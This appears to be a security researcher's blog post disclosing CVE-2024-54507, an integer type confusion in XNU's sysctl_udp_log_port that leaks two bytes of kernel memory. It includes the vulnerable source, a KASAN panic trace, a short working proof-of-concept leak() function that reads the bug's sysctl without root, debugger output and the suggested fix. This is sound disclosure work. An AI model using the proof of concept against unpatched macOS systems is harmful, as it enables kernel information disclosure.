JPRX.IO


< Home Light Mode


SUSCTL (CVE-2024-54507)

A particularly 'sus' sysctl in the XNU Kernel

The kernel might just be an impostor.

TLDR: here is a PoC.

Every time Apple releases a new version of XNU, I run a custom suite of tests under an address sanitizer to see if I can spot any regressions, or even possibly new bugs. When I was messing around with macOS 15.0, I was shocked to see a very simple command was causing the sanitizer to report an invalid load.

If you run sysctl -a on macOS 15.0 running with KASAN, you'll see a crash like the following:

panic(cpu 0): KASan: invalid 4-byte load [PARTIAL2]
 @kasan-report.c:114
Panicked task 0xffffff86aa0fc800: 1 threads: pid 602: sysctl
Backtrace (CPU 0), panicked thread: 0xffffff869afa90d0, Frame : Return Address
0xffffffff011ff450 : 0xffffff801849b53b mach_kernel : _handle_debugger_trap + 0x4bb
0xffffffff011ff4b0 : 0xffffff8018a0313a mach_kernel : _kdp_i386_trap + 0x15a
0xffffffff011ff4f0 : 0xffffff80189e9c13 mach_kernel : _kernel_trap + 0xe23
0xffffffff011ff680 : 0xffffff8018a0d051 mach_kernel : trap_from_kernel + 0x26
0xffffffff011ff6a0 : 0xffffff801849ab1a mach_kernel : _DebuggerTrapWithState + 0x9a
0xffffffff011ff7d0 : 0xffffff801849bbff mach_kernel : _panic_trap_to_debugger + 0x2af
0xffffffff011ff840 : 0xffffff801a130ec4 mach_kernel : _panic + 0x8a
0xffffffff011ff930 : 0xffffff801a15e783 mach_kernel : _kasan_report_internal.cold.1 + 0x23
0xffffffff011ff940 : 0xffffff801a1257a9 mach_kernel : _kasan_report_internal + 0x279
0xffffffff011ff9b0 : 0xffffff801a12528b mach_kernel : _kasan_crash_report + 0x2b
0xffffffff011ff9e0 : 0xffffff801a125995 mach_kernel : ___asan_report_load4 + 0x15
0xffffffff011ff9f0 : 0xffffff80192e23e4 mach_kernel : _sysctl_udp_log_port + 0x244
0xffffffff011ffad0 : 0xffffff801970b81c mach_kernel : _sysctl_root + 0xf4c
0xffffffff011ffc80 : 0xffffff801970c197 mach_kernel : _sysctl + 0x577
0xffffffff011ffed0 : 0xffffff8019c143b2 mach_kernel : _unix_syscall64 + 0x492
0xffffffff011fffa0 : 0xffffff8018a0d496 mach_kernel : _hndl_unix_scall64 + 0x16

Process name corresponding to current thread: sysctl

In case you aren't familiar with sysctl's, they are basically a set of runtime-controllable kernel variables that you can adjust from userspace. A lot of the time, the underlying resource of a given sysctl is literally just an integer in the kernel somewhere (like this). They're commonly used in kernel programming as a quick way to adjust parameters, and are used all over XNU.

Running sysctl -a will enumerate all sysctl's in the system. Somehow, doing this causes an invalid load.

There are a variety of ways to declare a sysctl using macros from sysctl.h with support for many common types, such as int's or struct's. These handle all the boilerplate for you of copying in values from userspace / copying kernel values out, and provide some security flags as well.

The more interesting kind of sysctl is SYSCTL_PROC, where a custom handler is used to service the sysctl instead of the kernel-supplied boilerplate. When writing a SYSCTL_PROC, you are responsible for validating user requests, updating the kernel state, and returning values to userspace.

You can read more about writing implementing sysctl's here [1].

The Bug

That brings us to our bug. sysctl_udp_log_port is one of those SYSCTL_PROC handlers, and is also the function in our backtrace causing a PARTIAL2 KASAN load violation. This handler is shared by four unique sysctl's:

Each of these sysctl's maps to a 2-byte uint16_t in the kernel defined in udp_log.c. The relationship between the user-visible sysctl name and the kernel variable is established using the SYSCTL_PROC macro.

When the user tries to read from or write to one of these four sysctl's, the handler method (where the bug is) is called. Let's take a look at the source of this handler function. According to the address sanitizer, we are loading 2 bytes too many- can you see why?

static int
sysctl_udp_log_port SYSCTL_HANDLER_ARGS
{
#pragma unused(arg1, arg2)
    int error;
    int new_value = *(int *)oidp->oid_arg1;

    error = sysctl_handle_int(oidp, &new_value, 0, req);
    if (error != 0) {
        return error;
    }
    if (new_value < 0 || new_value > UINT16_MAX) {
        return EINVAL;
    }
    *(uint16_t *)oidp->oid_arg1 = (uint16_t)new_value;

    return 0;
}

When sysctl_udp_log_port is invoked, oidp->oid_arg1 will point to one of the four uint16_t's from above, depending on which sysctl was requested. This function mostly just wraps sysctl_handle_int, which both validates the user requested new value for the sysctl (writing it into new_value), and simultaneously copies out the current value of the sysctl to userspace.

Before storing the new value back into the underlying uint16_t variable, the kernel checks if we are about to cause an overflow (returning EINVAL if so). If new_value is less than 0 or more than UINT16_MAX, we return EINVAL and do not update oid_arg1. Otherwise, we write new_value to oid_arg1, treating it as a properly sized uint16_t. This check is sufficient to prevent overwrites, but an overread has already occurred...

Integer Type Confusion

The bug is that when we load oidp->oid_arg1 into new_value, we treat it as an integer pointer (4 bytes), rather than a uint16_t pointer (2 bytes). That's why we observed 2 bytes of out-of-bounds data being read when we ran sysctl -a.

int new_value = *(int *)oidp->oid_arg1; // Out-of-bounds read because oid_arg1 is a u16, not i32

Then, when we call sysctl_handle_int, we pass the OOB read data back to userspace. Even though we detect the overflow and return EINVAL, the OOB read has already occurred, and is visible from userspace!

Leaking (2 bytes of) Kernel Memory

We can leak two bytes of kernel memory by simply reading from the last sysctl in memory (remote_port_excluded). This sysctl can be read without root.

void leak() {
    uint64_t val = 0;
    size_t len = sizeof(val);
    sysctlbyname("net.inet.udp.log.remote_port_excluded", &val, &len, NULL, 0);
    printf("leaked: 0x%X 0x%X\n", (val >> 16) & 0x0FF, (val >> 24) & 0x0FF);
}

I tried this on an xnu-11215.1.10 VMAPPLE ARM64 release flavor kernel that I compiled locally. In the kernel that I compiled I observed net.inet.udp.log_in_vain, some random other sysctl, placed directly after remote_port_excluded. As ARM64 is little-endian, we can leak the two least significant bytes of this variable.

% sysctl net.inet.udp.log_in_vain
net.inet.udp.log_in_vain: 0
% ./leak
leaked: 0x0 0x0
% sudo sysctl net.inet.udp.log_in_vain=0x1234
net.inet.udp.log_in_vain: 0 -> 4660
% ./leak
leaked: 0x34 0x12

Let's take a look at this in a debugger. I attached a debugger and used it to set the two bytes after udp_log_remote_port_excluded (at 0xfffffe002cbf9e8c) to 0xABCD. We should not be able to read these from userspace.

(lldb) p &udp_log_remote_port_excluded
(uint16_t *) 0xfffffe002cbf9e8a
(lldb) x/4bx 0xfffffe002cbf9e8a
0xfffffe002cbf9e8a: 0x00 0x00 0x00 0x00
(lldb) memory write 0xfffffe002cbf9e8c -s 2 0xABCD
(lldb) x/4bx 0xfffffe002cbf9e8a
0xfffffe002cbf9e8a: 0x00 0x00 0xcd 0xab
                    ────┬──── ────┬────
     udp log remote ────┘         └──── leak
     port excluded                      this

Then, I ran leak() and observed the leakage of data beyond the end of udp_log_remote_port_excluded:

% ./leak
leaked: 0xCD 0xAB

What can we leak?

"It depends(TM)".

udp_log.o's common section only has four things in it- those four uint16_t's. For each of them, we can leak 2 extra bytes. As they are all laid out sequentially in memory, the first 3 uint16_t's only give us the next successive variable, which we can already read. However, the last one (remote_port_excluded) leaks 2 bytes of whatever the linker decides to put after udp_log.o.

Here is what this looks like in memory:

udp_log.o's __common section:
┌──────────────────────┐
│  local_port_included │+0
├──────────────────────┤
│ remote_port_included │+2
├──────────────────────┤
│  local_port_excluded │+4
├──────────────────────┤
│ remote_port_excluded │+6
├──────────────────────┤ <- udp_log.o ends here
│         ???          │+8 <- We leak this
└──────────────────────┘

So, it's totally up to the linker what will be contained by those two bytes. On the kernel I built myself, this was some other sysctl, but on the kernel from the KDK I found that unused padding bytes were put there instead.

The linker's behavior is highly sensitive to build configurations and platform differences, so different XNU platforms will probably have different things placed there.

Bottom line is you get the two bytes after udp_log_remote_port_excluded, whatever they may be.

Fix Patch

At the time of writing, the source code for xnu-11215.61.5 (the version with the fix) is not out yet. When I reported this bug to Apple, I provided the following suggested fix.

@@ -436,7 +436,7 @@ sysctl_udp_log_port SYSCTL_HANDLER_ARGS
 {
 #pragma unused(arg1, arg2)
    int error;
-   int new_value = *(int *)oidp->oid_arg1;
+   int new_value = *(uint16_t *)oidp->oid_arg1;

    error = sysctl_handle_int(oidp, &new_value, 0, req);
    if (error != 0) {

Timeline

Takeaways

You can find a proof of concept here.

This bug is a neat example of how difficult kernel programming can be. Even the most seemingly innocuous loads can be deadly. Even though the authors were careful to prevent integer overflows, information leakage was still possible due to the initial 4-byte load.

Specifically, I thought this was a neat case study demonstrating BSD sysctl's, and is a good cautionary tale to any would-be sysctl authors to be careful of the consequences of every memory access.

There are many kernel variants for all the different XNU platforms, some of which might leak some interesting data (I didn't check them all). If anyone finds a cool way to use this bug, let me know! Find me on X @0xjprx.

References

[1] John Baldwin. "Implementing System Control Nodes (sysctl)". In: FreeBSD Journal (2014).

-ravi

January 23, 2025